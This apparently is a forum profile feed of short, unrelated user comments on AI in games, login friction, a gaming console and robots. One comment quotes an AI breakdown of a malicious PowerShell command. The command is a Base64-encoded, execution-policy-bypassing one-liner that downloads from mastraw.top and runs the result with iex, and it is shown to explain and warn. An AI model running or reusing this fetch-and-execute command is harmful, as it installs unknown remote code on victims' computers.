0 Followers
0 Following
1 Posts

Honestly, a small llm in these situations would be great idea, but it should be a very small local or hosted by the company itself (with a setting to turn off)

A small AI in games is the stuff I do want. But there is no reason gemni needs to be involved in a game at all

Yes, for the last Auth they had me use TOTP.

Thanks, still having my morning drink and forgot the name, When I replied.

Fully agree, it’s almost security theater.

They need to offer a way for use with a password manager, maybe a slightly hidden option or detecting a really long password to stop all the extra bits.

I forgot what the service was but it will have my user and pass, prompt the email verify, and then it will ask for the token generated in an Auth app.

At a certain point the proper user probably can’t get in

The sad thing is most the ones who would criticize it, are not the target audience. I have my gaming computer set up to be able to play to our living room when we want to. So the gabecube for me is not as good as a purchase (debating the controler though)

For someone who wants to play in their living room or about due a new gaming pc, it’s going to be the best thing for them.

When getting on your personal yacht, how many attendees are needed?

My understanding is part of it is that payment processor says stop doing it or we drop you all together. Not a we won’t be involved but lose them as an avenue.

Their way or highway, no real middle ground posible

One of the moments that Ai can be good. I asked googled gemni

This command is highly malicious and is designed to execute a script downloaded from a remote server. Here’s a breakdown of what each part does:

  • conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it’s being used as a wrapper.
  • powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.
    • powershell: Invokes the PowerShell interpreter.
    • /ep bypass: This is crucial. /ep stands for “execution policy.” bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
    • /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let’s decode the Base64 string to see the actual PowerShell command: Decoded PowerShell command: $site = Invoke-RestMethod ‘mastraw.top/me/day’; iex $site Now we can fully understand the malicious intent:
  • $site = Invoke-RestMethod ‘mastraw.top/me/day’: This command uses Invoke-RestMethod to download content from the URL mastraw.top/me/day. This URL is likely hosting a malicious PowerShell script or some other form of executable code.
  • ; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from mastraw.top/me/day (which is stored in the $site variable) and executes it directly as a PowerShell command. In summary, this command is designed to:
  • Bypass PowerShell’s security restrictions.
  • Download a script from a specific remote website (mastraw.top/me/day).
  • Immediately execute that downloaded script on the victim’s computer. The content of the script downloaded from mastraw.top/me/day is unknown without accessing that URL, but given the nature of this command, it’s almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.
I don’t understand the corlation between hateing pedestrians (fully agree) and the self driving car

Mostly agree. They should make v1 have trends but the idea of something built like us is needed because then less alterations have to be made and it can fit with what’s already around.

If you have a warehouse that uses ladders for some things easier to have a bot that can already handle that then something that needs further installation and such

It is a mine field. The fact that it can generate almost an exact copy of some things if it’s over trained on an image or if the stars hit just right

On a different not llm is Large Language Model not the image generator